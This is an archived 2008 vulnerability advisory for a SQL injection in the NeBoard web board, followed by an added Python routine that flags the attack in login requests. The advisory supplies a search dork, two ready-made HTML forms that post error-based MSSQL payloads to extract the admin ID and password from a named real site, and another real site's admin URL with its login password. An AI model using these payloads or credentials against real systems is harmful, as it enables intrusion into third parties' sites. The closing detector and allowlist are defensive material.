securityvulns SECURITYVULNS:DOC:20282
History: Aug 04, 2008 - 12:00 a.m.

NeBoard Sql Injection Vulnerability


Discovered by : Alemin_Krali

NeBoard Sql Injection Vulnerability [Post Sql]

Dork: inurl:show.asp?id= ref= step= level= page=

Two HTML forms are used:

Form 1: retrieves the ID name.
Form 2: retrieves the admin password.
Afterwards, open HTTP://SITE.COM/admin/board_edit.asp?id=IDNAME and log in with the admin
password obtained from form 2.
Example: http://eng.habitat.or.kr/Hboard/admin/board_edit.asp?id=free_old
Login password: test, and you are admin :)

<body onload="document.LoginForm.Password.focus();">
<form name="LoginForm"
action="http://www.globalcircuit.co.kr/board//admin//login_confirm.asp" method="post">
<input type="submit" value="Go ID Name">
<input type="hidden" name="url"
value="http://www.globalcircuit.co.kr/board//admin//login_form.asp">
<input type="hidden" name="query" value="">
<input type="hidden" name="id" value="'and 1=convert(int,(select top 1 ID from
BoardManager))–">

<body onload="document.LoginForm.Password.focus();">
<form name="LoginForm"
action="http://www.globalcircuit.co.kr/board//admin/login_confirm.asp" method="post">
<input type="submit" value="Go ID table Admin Password">
<input type="hidden" name="url"
value="http://www.globalcircuit.co.kr/board//admin/login_form.asp">
<input type="hidden" name="query" value="">
<input type="hidden" name="id" value="'and 1=convert(int,(select top 1 AdminPW from
BoardManager))–">
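
Both forms post a convert(int,(select ...)) subquery in the "id" field of login_confirm.asp, so the board ID can be checked against an allowlist and the pattern flagged before it reaches the database. The check below is an added example, not part of the original advisory or of NeBoard; the function name, the finding labels and the assumed ID format (letters, digits and underscore, as in "free_old") are assumptions, and the sample request bodies are constructed.

```python
import re
from urllib.parse import parse_qs, urlencode

# Assumption: legitimate board ids look like "free_old" (letters, digits, underscore).
BOARD_ID = re.compile(r"[A-Za-z0-9_]{1,64}")

# Error-based MSSQL extraction: a subquery forced through an int conversion,
# e.g. convert(int,(select ...)) or cast((select ...) as int).
CONVERT_SUBQUERY = re.compile(
    r"\b(?:convert\s*\(\s*int\s*,|cast\s*\()\s*\(?\s*select\b", re.IGNORECASE
)


def inspect_login_post(path, body):
    """Return findings for one urlencoded POST to the board's admin login."""
    findings = []
    # Doubled slashes ("/board//admin//login_confirm.asp") still end the same way.
    if not path.lower().rstrip("/").endswith("login_confirm.asp"):
        return findings
    fields = parse_qs(body, keep_blank_values=True)  # decodes %27, +, %28 ...
    for value in fields.get("id", []):
        if not BOARD_ID.fullmatch(value):
            findings.append("id-not-allowlisted")
        if CONVERT_SUBQUERY.search(value):
            findings.append("mssql-convert-subquery")
    return findings


# Constructed sample bodies. The "id" value of the first one is the string
# from the advisory's first form, encoded the way a browser would send it.
SAMPLE_ATTACK = urlencode({
    "url": "",
    "query": "",
    "id": "'and 1=convert(int,(select top 1 ID from BoardManager))–",
})
SAMPLE_BENIGN = urlencode({"url": "", "query": "", "id": "free_old"})

if __name__ == "__main__":
    for body in (SAMPLE_ATTACK, SAMPLE_BENIGN):
        print(inspect_login_post("/board//admin//login_confirm.asp", body))
```

The allowlist is the stronger control of the two: it rejects the value whatever SQL it carries, while the pattern match only gives a specific label for logging.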

